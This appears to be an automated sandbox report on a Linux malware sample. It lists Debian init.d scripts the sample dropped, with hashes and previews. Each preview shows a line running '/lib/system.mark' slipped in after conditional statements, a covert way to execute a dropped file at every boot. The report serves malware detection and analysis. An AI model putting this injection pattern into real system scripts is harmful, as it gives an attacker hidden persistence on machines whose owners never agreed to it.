Preview:	#!/bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: lvm2-lvmpolld.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: LVM2 poll daemon.### END INIT INFO..DESC="LVM2 poll daemon".DAEMON=/sbin/lvmpolld.DAEMON_ARGS="-t 60".PIDFILE=/run/lvmpolld.pid..do_start_prepare() {. mkdir -m 0700 -p /run/lvm.}..

/etc/init.d/mono-xsp4

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.328823038467521
Encrypted:	false
SSDEEP:	48:7HvaUX9Q3esRt3uK4PWNr/42iwk3qmA4JO4pTjmCjVwUH:7PaUX0eSt3BacznDsbjmCjVwS
MD5:	70A5C40B509AEA9932FA851AD70ACB57
SHA1:	463305EFCF59020D68D1E2111298EE20612D0D73
SHA-256:	04F0D49C9370F56A6BC18A6CCDE3672D5B1A8765E6522C5C55D97CCF8A21AE5C
SHA-512:	E9BF78D0D63370C7C4ED5BA1CDFD3BA2A3269269EFEC61C1027CC1FD37496CE6F179E8BDBB5554C23234744CEFE39C3CB7964C22C8A99618E83160D3E0DC879B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: mono-xsp4.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Should-Start: .# Should-Stop:.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Mono XSP4.# Description: Debian init script for Mono XSP4..### END INIT INFO.#.# Written by Pablo Fischer <pablo@pablo.com.mx>.# Dylan R. E. Moonfire <debian@mfgames.com>.# Modified for Debian GNU/Linux.#.# Version:.@(#)mono-xsp4 pablo@pablo.com.mx.#..# Variables.PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/bin/xsp4.NAME=mono-xsp4.DESC="XSP 4.0 WebServer".DEFAULT=/etc/default/$NAME.CFGDIR=/etc/xsp4.VIRTUALFILE=$CFGDIR/debian.webapp.MONO_SHARED_DIR=/var/run/$NAME.start_boot=false..# Use LSB.. /lib/lsb/init-functions..# If we don't have the basics, don't bother.test -x $DAEMON \|\| exit 0.test -f $DEFAULT && . $DEFAULT...if [ "x$start_boot" != "xtrue" ] ; then./lib/system.mark. exit 0.fi..if [ ! -e $MO

/etc/init.d/multipath-tools

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2964
Entropy (8bit):	5.319082661316184
Encrypted:	false
SSDEEP:	48:7HUksR9JmtLLCDCJ9ETaPn1PCDCJ9ETafOBUV1kqH2fQuEfg64U149Hh7KKSKMs:7HUkwbmhmDr+Pn1qDr+2qV1RHSQuav4D
MD5:	FA339A7172040C330DC30E65E29BE1D1
SHA1:	F558AD0D3435E5F9E486820B9844031CF83450B1
SHA-256:	7C1F374BB9BBDB94BE70ED2E096594A97C0A8E4A79F28F7D5789A0BE7BCE4983
SHA-512:	C5E80E9CBB87EE001E60B84D8A89464BE8661EAD8CAF2453A20B8073EF0CF87524FF1959FF1020F363F7341A3938614FBA6258FFE145AF1B4DD826D5DA5D923B
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: multipath-tools.# Required-Start: udev $local_fs $remote_fs $syslog.# Required-Stop: udev $local_fs $remote_fs $syslog.# Should-Start: iscsi.# Should-Stop: iscsi.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: multipath daemon.# Description:.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin/:/usr/bin.DAEMON=/sbin/multipathd.NAME=multipathd.DESC="multipath daemon".syspath=/sys/block..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -f /etc/default/multipath-tools ] ; then./lib/system.mark... /etc/default/multipath-tools.fi..teardown_slaves().{.cd $1; .if [ -d "slaves" ]; then./lib/system.mark.for slave in slaves/;.do..if [ "$slave" = "slaves/" ]; then./lib/system.mark...read dev < $1/dev...tablename=$(dmsetup table --target multipath \| sed -n "s/$.$: . $dev .*/\1/p")...if ! [ -z $tablename ]; then./lib/system.mark....log_daemon_msg "Root is on a multipathed device, multipathd c

/etc/init.d/open-iscsi

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.114269594803135
Encrypted:	false
SSDEEP:	48:7UMRMrEm3cy8NL/NgZlfHMtWBAl3ATeTPAdWI4RdWdtRHg02AC9ArANTcAhicF:7b2rH338lmZlfs/lwA4dWI6C7DUbL
MD5:	B48EB035141800F7976971DFDB30D671
SHA1:	18D8B59AD64232DEBB186270DA8172D0C1DE47A8
SHA-256:	E28FD9022AC23B3ED07D6223DC2EAA12DDE98FAA3D8AF142CB091C9C58ACB3A3
SHA-512:	7D617DC4E0DA0BE90FB869253093E122A9EF3F78AE0F838167BDF210AA0310A2E753EB2E22B45A9BE4E05C4DDE711AE0768BC3CF21650D990F3BFF29D4D59EA7
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: open-iscsi iscsi.# Required-Start: $network $local_fs iscsid.# Required-Stop: $network $local_fs iscsid sendsigs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Login to default iSCSI targets.# Description: Login to default iSCSI targets at boot and log out.# of all iSCSI targets at shutdown..### END INIT INFO..PATH=/sbin:/bin.DAEMON=/sbin/iscsid.ADM=/sbin/iscsiadm.PIDFILE=/run/iscsid.pid.NAMEFILE=/etc/iscsi/initiatorname.iscsi.CONFIGFILE=/etc/iscsi/iscsid.conf.OMITDIR=/run/sendsigs.omit.d..[ -x "$DAEMON" ] \|\| exit 0... /lib/lsb/init-functions..# Include defaults if available.if [ -f /etc/default/open-iscsi ]; then./lib/system.mark... /etc/default/open-iscsi.fi...if [ ! -d /sys/class/ ]; then./lib/system.mark. log_failure_msg "iSCSI requires a mounted sysfs, not started.". exit 0.fi..RETVAL=0..start() {..if ! [ -s $PIDFILE ] \|\| ! kill -0 `sed -n 1p $PIDFILE` >/dev/null ; then./l

/etc/init.d/open-vm-tools

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1881
Entropy (8bit):	4.866964949464276
Encrypted:	false
SSDEEP:	48:1a/f0aOHh8R/X/DA4pWh8FgM8QhmMl8FkgPooG2DKYUP:1a/f0aOB8Rk4e8j8Q8Ml8OmooG2D3k
MD5:	97AC49C2355ACB94890353EE4381A945
SHA1:	D847EF688D5785E54FB463C2E00B0922BA0E4060
SHA-256:	86FBD32099B190A52DFF0ADCFB72BE3F9C13C3A6F47DE40EA3DF1E056B9616B5
SHA-512:	FA42FE8BD21D8C08CD437817F9E29EEED43961E13E3E0456E42696921D14BCD307A0E38580D2DD97D5D5F0A23BF8523748BAB6AA1187D227EE7F5DD99207911E
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..open-vm-tools.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# X-Start-Before:.# X-Stop-After:.# Default-Start:.2 3 4 5.# Default-Stop:..0 1 6.# Description:..Runs the open-vm-tools services.# Short-Description:.Runs the open-vm-tools services.### END INIT INFO... /lib/lsb/init-functions..exit_if_not_in_vm () {. if which systemd-detect-virt 1>/dev/null; then./lib/system.mark. checktool='systemd-detect-virt'. else. checktool='vmware-checkvm'. fi.. if ! ${checktool} \| grep -iq vmware; then./lib/system.mark. echo "open-vm-tools: not starting as this is not a VMware VM". exit 0. fi.}..case "${1}" in. start). # Check if we're running inside VMWare. exit_if_not_in_vm.. log_daemon_msg "Starting open-vm daemon" "vmtoolsd". start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null \|\| exit 1.

/etc/init.d/plymouth

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1401
Entropy (8bit):	5.307601355730172
Encrypted:	false
SSDEEP:	24:1sqE3A2EYVwMwRwDTMBgK2APfcVwAPYIpPgfS+UGgEIT8YojAf5XERmgLGmgOS/F:1sl3AhYG7RgzJAsVwAgGYfdUz58Y9f5v
MD5:	0F6B71C6CC119B9DDB34511BD4CF6A49
SHA1:	F7D8BE03B71EB7597F724CB97C2A8AE62F14A843
SHA-256:	6A8A127B9D7DE62A9130A55E39521A26D48BE4EC9830AC0C986E3202FE5C5B3C
SHA-512:	EA0DA81729692BA97978031A72AA79B06E004F1B6D9AE534C68F34AEB65A5FFD9F91F5C1CA27CB6E38DE20E86A0C3C6E5A84C0A70E011C5D91AFBBA7EA647BB4
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth.# Required-Start:.udev $remote_fs $all.# Required-Stop:.$remote_fs.# Should-Start:..$x-display-manager.# Should-Stop:..$x-display-manager.# Default-Start:.2 3 4 5.# Default-Stop:..0 6.# Short-Description:.Stop plymouth during boot and start it on shutdown.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth".DESC="Boot splash manager"..test -x /sbin/plymouthd \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..SPLASH="true".for ARGUMENT in $(cat /proc/cmdline).do..case "${ARGUMENT}" in...splash)....SPLASH="true"....;;....nosplash\|plymouth.enable=0)....SPLASH="false"....;;..esac.done..case "${1}" in..start)...case "${SPLASH}" in....true)...../bin/plymouth quit --retain-splash.....;;...esac...;;...stop)...case "${SPLASH}" in....true).....if ! plymouth --ping.....then./lib/system.mark....../sbin/plymouthd --mode=shutdown.....fi......RUNLEV

/etc/init.d/plymouth-log

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	787
Entropy (8bit):	5.281955883729912
Encrypted:	false
SSDEEP:	12:1snBEfVmWr2lr4HhJ8PWXsbgwfGgrCRzD02xgvRiqhtcy5RujGqGRujrVgDn:1sBEf0FlwhuPBb9GgMHxgvR4MLoVS
MD5:	F42950D3F937B049D8ECC88A59A65CA3
SHA1:	E74080DDEE0664F4069E7558C68D2795B752DC55
SHA-256:	6637BB47EA46FB3556AF6B2A9A39574046FD06237D0BB65D7077F3734B593A00
SHA-512:	15E48460FDDF9863D5827E8B584BBED72C7EA95DF67C4A9A68E5CF4750C35DEFB8C5C6311DCDCEE9E2608DEE91DC6F76F8D6ED69287F6619AFCF5904AA72A168
Malicious:	true
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides:..plymouth-log.# Required-Start:.$local_fs $remote_fs.# Required-Stop:.$local_fs $remote_fs.# Should-Start:.# Should-Stop:.# Default-Start:.S.# Default-Stop:.# Short-Description:.Inform plymouth that /var/log is writable.### END INIT INFO..PATH="/sbin:/bin:/usr/sbin:/usr/bin".NAME="plymouth-log".DESC="Boot splash manager (write log file)"..test -x /bin/plymouth \|\| exit 0..if [ -r "/etc/default/${NAME}" ].then./lib/system.mark... "/etc/default/${NAME}".fi... /lib/lsb/init-functions..set -e..case "${1}" in..start)...if plymouth --ping...then./lib/system.mark..../bin/plymouth update-root-fs --read-write...fi...;;...stop\|restart\|force-reload)....;;...*)...echo "Usage: ${0} {start\|stop\|restart\|force-reload}" >&2...exit 1...;;.esac..exit 0..

/etc/init.d/procps

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	942
Entropy (8bit):	5.254527998623176
Encrypted:	false
SSDEEP:	12:atdRDNeBuYryMmCU3sBww+k12FsnM5ldlPSSHTm5TeQxala5tV86s+L2s4hk2z7w:aLXx/25+Z+nMfTWTeCKa3VfhL69z0
MD5:	CBFDB92FECA62D963DF3A25F15C3E88D
SHA1:	14A84AD6ACD0DDD5777C86FAC10894212CE44F57
SHA-256:	84225825C32D1961412656F3D0F7D43B2BBB7BB84B34B94B8C678BAC10367DF2
SHA-512:	1FF7EC530B2CEB51C342E1103849F79B935EAC27965C081F90298B74909C1676B88CBEC2E792418F00CC8BFECB4E47B28F137B233A2325F508A550236BDADE4B
Malicious:	true
Preview:	#! /bin/sh.# kFreeBSD do not accept scripts as interpreters, using #!/bin/sh and sourcing..if [ true != "$INIT_D_SCRIPT_SOURCED" ] ; then./lib/system.mark. set "$0" "$@"; INIT_D_SCRIPT_SOURCED=true . /lib/init/init-d-script.fi.### BEGIN INIT INFO.# Provides: procps.# Required-Start: mountkernfs $local_fs.# Required-Stop:.# Should-Start: udev module-init-tools.# X-Start-Before: $network.# Default-Start: S.# Default-Stop:.# Short-Description: Configure kernel parameters at boottime.# Description: Loads kernel parameters that are specified in /etc/sysctl.conf.### END INIT INFO.#.# written by Elrond <Elrond@Wunder-Nett.org>..DESC="Setting kernel variables".DAEMON=/sbin/sysctl.PIDFILE=none..# Comment this out for sysctl to print every item changed.QUIET_SYSCTL="-q"..do_start_cmd() {..STATUS=0..$DAEMON $QUIET_SYSCTL --system \|\| STATUS=$?..return $STATUS.}..do_stop() { return 0; }.do_status() { return 0; }..

/etc/init.d/rsync

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4639
Entropy (8bit):	5.255106060955411
Encrypted:	false
SSDEEP:	96:jdRMYo498R0Fz/T+U0lKMuHk8gajHoNUMkx:jdRMYJ98i+U0c1Ex6INUJx
MD5:	4D1E075A3D6AB76CE7754595802D6C77
SHA1:	F44434087B007BABB314B8277FFC731930DF0A13
SHA-256:	5E770B82809000BC0C33FA4901341EC6379D5B799AF444850D0C8D5B33E9B7F9
SHA-512:	59F9462BCF7A5606187A4EBA51C41D243A5C9EDE484FDD65BA28322F476C22F5FA6866D87C55C40C14E676C4BBD8D4D8455FCADEAECBF7DEA26262DF6418C72B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides: rsyncd.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# Should-Start: $named autofs.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: fast remote file copy program daemon.# Description: rsync is a program that allows files to be copied to and.# from remote machines in much the same way as rcp..# This provides rsyncd daemon functionality..### END INIT INFO..set -e..# /etc/init.d/rsync: start and stop the rsync daemon..DAEMON=/usr/bin/rsync.RSYNC_ENABLE=false.RSYNC_OPTS=''.RSYNC_DEFAULTS_FILE=/etc/default/rsync.RSYNC_CONFIG_FILE=/etc/rsyncd.conf.RSYNC_PID_FILE=/var/run/rsync.pid.RSYNC_NICE_PARM=''.RSYNC_IONICE_PARM=''..test -x $DAEMON \|\| exit 0... /lib/lsb/init-functions..if [ -s $RSYNC_DEFAULTS_FILE ]; then./lib/system.mark. . $RSYNC_DEFAULTS_FILE. case "x$RSYNC_ENABLE" in..xtrue\|xfalse).;;..xinetd)..exit 0....;;..*)..log_fail

/etc/init.d/rsyslog

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2899
Entropy (8bit):	5.277181564959481
Encrypted:	false
SSDEEP:	48:7cqmpKHnuoz/SWSZABLG/tm3RpZWE/eXt5Ih3iLqWpvU8lbzZdaZ2YI:75sKHuS8ZABLG1m3rZWE2Xt5Ih3iR5JT
MD5:	816DFAE328401DBA31A79591D3EBC3F2
SHA1:	C42E6F379838212F512CB4EEFEBBCD33DF67F7F0
SHA-256:	72FADCABE0BF5AD5B5BC3382B434617A3E58EE6FE8FA959B8698E5C0EACCA22F
SHA-512:	62D2B90E1EA0070B376E8E9E9E6BF49094B58491D66FD30482EA1A34FC6CDB7010B12C30012320BE3E963B6D38521E6E36E71AF069115852927859FAF30979DF
Malicious:	true
Preview:	#! /bin/sh.### BEGIN INIT INFO.# Provides: rsyslog.# Required-Start: $remote_fs $time.# Required-Stop: umountnfs $time.# X-Stop-After: sendsigs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: enhanced syslogd.# Description: Rsyslog is an enhanced multi-threaded syslogd..# It is quite compatible to stock sysklogd and can be .# used as a drop-in replacement..### END INIT INFO..#.# Author: Michael Biebl <biebl@debian.org>.#..# PATH should only include /usr/* if it runs after the mountnfs.sh script.PATH=/sbin:/usr/sbin:/bin:/usr/bin.DESC="enhanced syslogd".NAME=rsyslog..RSYSLOGD=rsyslogd.DAEMON=/usr/sbin/rsyslogd.PIDFILE=/run/rsyslogd.pid..SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$DAEMON" ] \|\| exit 0..# Read configuration variable file if it is present.[ -r /etc/default/$NAME ] && . /etc/default/$NAME..# Define LSB log_* functions... /lib/lsb/init-functions..do_st

/etc/init.d/saned

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2293
Entropy (8bit):	5.008592969018552
Encrypted:	false
SSDEEP:	24:aruzoYFiVHCVhQJABlRi5tzldBOVQReMdHwdNw5G/9yNuFibjBk2Jwq5MxnR5/2F:e7Y0u/i5t7RbewG/9diy2OXnL/iOs1
MD5:	0F06F605D05EA59E83CFDB744A720668
SHA1:	ED458D2DC1CF9F7EEACF612295016DD4C67FA431
SHA-256:	1C4C499846B5D9E180E604B84553A2ADD06C11D447C4AC5F42DB30EF5030944D
SHA-512:	B3BA6C58E83F3C79C6E28AC8EB78184003A17AB8635F013BBBD50363D515344B5619CA008F9F453A8BBBCA01BCF0E649828B0CB1ED6D1BE87085CA4E225FF84C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Provides: saned.# Required-Start: $syslog $local_fs $remote_fs.# Required-Stop: $syslog $local_fs $remote_fs.# Should-Start: dbus avahi-daemon.# Should-Stop: dbus avahi-daemon.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: SANE network scanner server.# Description: saned makes local scanners available over the.# network..### END INIT INFO... /lib/lsb/init-functions..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.DAEMON=/usr/sbin/saned.NAME=saned.DESC="SANE network scanner server"..test -x $DAEMON \|\| exit 0..RUN=no.RUN_AS_USER=saned..# Get lsb functions.. /lib/lsb/init-functions..# Include saned defaults if available.if [ -f /etc/default/saned ] ; then./lib/system.mark. . /etc/default/saned.fi..DAEMON_OPTS="-a $RUN_AS_USER"..set -e..case "$1" in. start)..log_daemon_msg "Starting $DESC" "$NAME"..start-stop-daemon --start --quiet --pidfile /var/run/$N

/etc/init.d/screen-cleanup

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1274
Entropy (8bit):	5.012565313964516
Encrypted:	false
SSDEEP:	24:c26Nr+XEgBYxABoO21phrqeYCRjeyvcsTN/RdT7d/Ldld/7K9jp:cPQoO23BqeYSjeybRRdHdTdld/7K9jp
MD5:	8EFA67FAE6C01453D5F673251C44E223
SHA1:	ADDB6A8C1B7D583B959EDF19684A1BE2FA76D541
SHA-256:	48026B299BBAD064F39CB6351B3E6D60E6EA324BB9DF6D777D132F19B2386E5D
SHA-512:	306042F4929D7BCBB98CC2E14A04D3E36DA7E7BA87F7997CD46DCD7DD2F856D1102469B99D623F6F339F419FD247EBE0ED02C446ADE7FD214F6F14A9156B45F0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.# $Id: init,v 1.3 2004/03/16 01:43:45 zal Exp $.#.# Script to remove stale screen named pipes on bootup..#..### BEGIN INIT INFO.# Provides: screen-cleanup.# Required-Start: $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop:.# Short-Description: screen sessions cleaning.# Description: Cleans up the screen session directory and fixes its.# permissions if needed..### END INIT INFO..set -e..test -f /usr/bin/screen \|\| exit 0..SCREENDIR=/run/screen..case "$1" in.start). if test -L $SCREENDIR \|\| ! test -d $SCREENDIR; then./lib/system.mark. rm -f $SCREENDIR. mkdir $SCREENDIR. chown root:utmp $SCREENDIR. [ -x /sbin/restorecon ] && /sbin/restorecon $SCREENDIR. fi. find $SCREENDIR -type p -delete.# If the local admin has used dpkg-statoverride to install the screen.# binary with different set[ug]id bits, change the permissions of.# $SCREENDIR accordingly. BINARYPERM=`stat -c%a /usr/bin/screen`. if [ "

/etc/init.d/spice-vdagent

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2519
Entropy (8bit):	4.743587167790472
Encrypted:	false
SSDEEP:	48:DFZazGMU+rI4CXyUH0I6zroGt//AhrHoGa//AuiIngcu/syylyTIsD2E8AB6/oBa:DF0GMU+1iD6foGtQRHoGaQuiIngczVII
MD5:	5D4D9388F89B176957FDD414AF0D3385
SHA1:	206408E65660EFF14DE046FBECC38DDA2BCD403F
SHA-256:	9EDA8584AF6D1D332C01FD105D83BF5DBD41E10148E276D350DE07835A64494D
SHA-512:	CA317DCB2DB3D6EB63088CF6548CF800C5B2D64430C34F0E587EFA9CE7B4D72B35AAD70516BEECCC19848D3AF3673DAB295F19E923BA5E4700234842BFE38EF8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.#.# spice-vdagent Agent daemon for Spice guests.#.# chkconfig: 345 70 30.# description: Together with a per X-session agent process the spice agent \.# daemon enhances the spice guest user experience with client \.# mouse mode, guest <-> client copy and paste support and more...### BEGIN INIT INFO.# Provides: . .spice-vdagent.# Required-Start: .$local_fs $remote_fs.# Required-Stop: .$local_fs $remote_fs.# Should-Start: .dbus.# Should-Stop: ..# Default-Start: .2 3 4 5.# Default-Stop: .0 1 6.# Short-Description: .Agent daemon for Spice guests.# Description: .Together with a per X-session agent process the spice agent.# .daemon enhances the spice guest user experience with client.# .mouse mode, guest <-> client copy and paste support and more..### END INIT INFO...exec="/usr/sbin/spice-vdagentd".prog="spice-vdagentd".pidfile="/var/run/spice-vdagentd/spice-vdagentd.pid".port="/dev/virtio-ports/com.redhat.spic

/etc/init.d/ssh

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	4195
Entropy (8bit):	5.078291501927291
Encrypted:	false
SSDEEP:	96:jkXSV2BP3Jr4VRy5HoYokXHe5KyWU/O8IhQ:j1ol3J8VOIPq3cBIhQ
MD5:	53996396D16C98D4AF1BF71D33AE801F
SHA1:	D47C0F3E4DE104B2DAE047AC53BA85ADFD53B26B
SHA-256:	D2C361A5A6A9FDEAF530420A519CA1BCB022B13B5B35B827544D70ED99B98720
SHA-512:	34636E86E4652B1212E5F74E4E792E46786E5FDFDB9ECB7DB085339EDCA9DF752D7B71EF97FE4738921E53825DFB0AECCE877324675A60594A0955B4EC2BFB38
Malicious:	true
Preview:	#! /bin/sh..### BEGIN INIT INFO.# Provides:..sshd.# Required-Start:.$remote_fs $syslog.# Required-Stop:.$remote_fs $syslog.# Default-Start:.2 3 4 5.# Default-Stop:...# Short-Description:.OpenBSD Secure Shell server.### END INIT INFO..set -e..# /etc/init.d/ssh: start and stop the OpenBSD "secure shell(tm)" daemon..test -x /usr/sbin/sshd \|\| exit 0.( /usr/sbin/sshd -\? 2>&1 \| grep -q OpenSSH ) 2>/dev/null \|\| exit 0..umask 022..if test -f /etc/default/ssh; then./lib/system.mark. . /etc/default/ssh.fi... /lib/lsb/init-functions..if [ -n "$2" ]; then./lib/system.mark. SSHD_OPTS="$SSHD_OPTS $2".fi..# Are we running from init?.run_by_init() {. ([ "$previous" ] && [ "$runlevel" ]) \|\| [ "$runlevel" = S ].}..check_for_no_start() {. # forget it if we're trying to start, and /etc/ssh/sshd_not_to_be_run exists. if [ -e /etc/ssh/sshd_not_to_be_run ]; then ./lib/system.mark..if [ "$1" = log_end_msg ]; then./lib/system.mark.. log_end_msg 0 \|\| true..fi..if ! run_by_init; then./lib/syst

/etc/init.d/udev

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	7281
Entropy (8bit):	4.991252121789465
Encrypted:	false
SSDEEP:	96:l7vnKGhtBLNNqeIRbyxwfmgBL6FGGgGBj2davQKBJKCYrSVDvtvP7WGP7TQKBJKk:l93DYPbV7+262daaJrSVztbWIeWymj
MD5:	6B8B951DD1036426916D86617F889FB3
SHA1:	5845C804AEE0A2C89AA314083FDB112D90B0AE75
SHA-256:	672A832E328D4AC70CE72DB88A220443383378ED574448B8A31F743707EAB48D
SHA-512:	DC3D3C056719853FE920BF0622CACFEDE05618331D85DC138C7C462B982222F2F746AF09B77815CDE542DACA4DCD24D084912CCE5F7DEE608431776D3B21BEC4
Malicious:	true
Preview:	#!/bin/sh -e.### BEGIN INIT INFO.# Provides: udev.# Required-Start: mountkernfs.# Required-Stop: umountroot.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Start systemd-udevd, populate /dev and load drivers..### END INIT INFO..PATH="/sbin:/bin".NAME="systemd-udevd".DAEMON="/lib/systemd/systemd-udevd".DESC="hotplug events dispatcher".PIDFILE="/run/udev.pid".CTRLFILE="/run/udev/control".OMITDIR="/run/sendsigs.omit.d"..# we need to unmount /dev/pts/ and remount it later over the devtmpfs.unmount_devpts() {. if mountpoint -q /dev/pts/; then./lib/system.mark. umount -n -l /dev/pts/. fi.. if mountpoint -q /dev/shm/; then./lib/system.mark. umount -n -l /dev/shm/. fi.}..# mount a devtmpfs over /dev, if somebody did not already do it.mount_devtmpfs() {. if grep -E -q "^[^[:space:]]+ /dev devtmpfs" /proc/mounts; then./lib/system.mark. mount -n -o remount,nosuid,size=$tmpfs_size,mode=0755 -t devtmpfs devtmpfs /dev. return. fi.. if ! mount -

/etc/init.d/ufw

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	2220
Entropy (8bit):	4.762470767686369
Encrypted:	false
SSDEEP:	48:1LleiFZd/nzngwjacTM/JrNWwh/JbeTX9l:1BDFfrbQvnq
MD5:	8852A1EF1E949822CC57D126739775E7
SHA1:	BB530632CE040ACF6D772A83E55594AE03233D2A
SHA-256:	D47B4F30B3710EBA0EA899BD483D2639EEC4EFE1E2196F3CC69D6C317A182D9D
SHA-512:	428D49507F1A9E84BE55BA66EBD1E6557E87EABE10BC4CAB0003260279FADE812996410AFD00DA0C49E1A42C2008D2B61ADC7A43470C582FC66840120A827A1D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh..### BEGIN INIT INFO.# Provides: ufw.# Required-Start: $local_fs.# Required-Stop: $local_fs.# Default-Start: S.# Default-Stop: 1.# Short-Description: start firewall.# Description: Start ufw firewall.### END INIT INFO..set -e..PATH="/sbin:/bin"..[ -d /lib/ufw ] \|\| exit 0... /lib/lsb/init-functions..for s in "/lib/ufw/ufw-init-functions" "/etc/ufw/ufw.conf" "/etc/default/ufw" ; do. if [ -s "$s" ]; then./lib/system.mark. . "$s". else. log_failure_msg "Could not find $s (aborting)". exit 1. fi.done..error=0.case "$1" in.start). if [ "$ENABLED" = "yes" ] \|\| [ "$ENABLED" = "YES" ]; then./lib/system.mark. log_action_begin_msg "Starting firewall:" "ufw". output=`ufw_start` \|\| error="$?". if [ "$error" = "0" ]; then./lib/system.mark. log_action_cont_msg "Setting kernel variables ($IPT_SYSCTL)". fi. if [ ! -z "$output" ]; then./lib/system.mark. echo "$output" \| while read

/etc/init.d/unattended-upgrades

Download File

Process:	/tmp/0S3wxWer8x.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	1426
Entropy (8bit):	5.3259172883252655
Encrypted:	false
SSDEEP:	24:aMXni+12wpFKFOGofwWlf/HNVKowwflH+hF/7Px1gr:bni23FKFpbw3GnoH+Dbx2
MD5:	D520212A01E843BEC46C2A22FAD820FD
SHA1:	53E168B97E300038916C1038B59912B23AB2C0AF
SHA-256:	89C4F9A9999E7DB3526C63DF22A69161F6328EEB8E58B8640BDEB4676BFF6DA5
SHA-512:	E08F7E3736EB322F4C49636515B1AAE43299F09504A63B9920F93D2E42518108E4090E3F622AA6B18E2D196C89BAC0BF74884AA5FDC023CE25D8D529653D0876
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#! /bin/sh.#.### BEGIN INIT INFO.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Provides: unattended-upgrade-shutdown-check.# Default-Start: 2 3 4 5.# Default-Stop: 0 6.# Short-Description: Check if unattended upgrades are being applied.# Description: Check if unattended upgrades are being applied.# and wait for them to finish.### END INIT INFO.set -e..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin..NAME="unattended-upgrades-shutdown".DESC="unattended package upgrades shutdown".SCRIPTNAME="/etc/init.d/$NAME".SHUTDOWN_HELPER="/usr/share/unattended-upgrades/unattended-upgrade-shutdown"..if [ -x /usr/bin/python3 ]; then./lib/system.mark. PYTHON=python3.else. PYTHON=python.fi..# Load the VERBOSE setting and other rcS variables.. 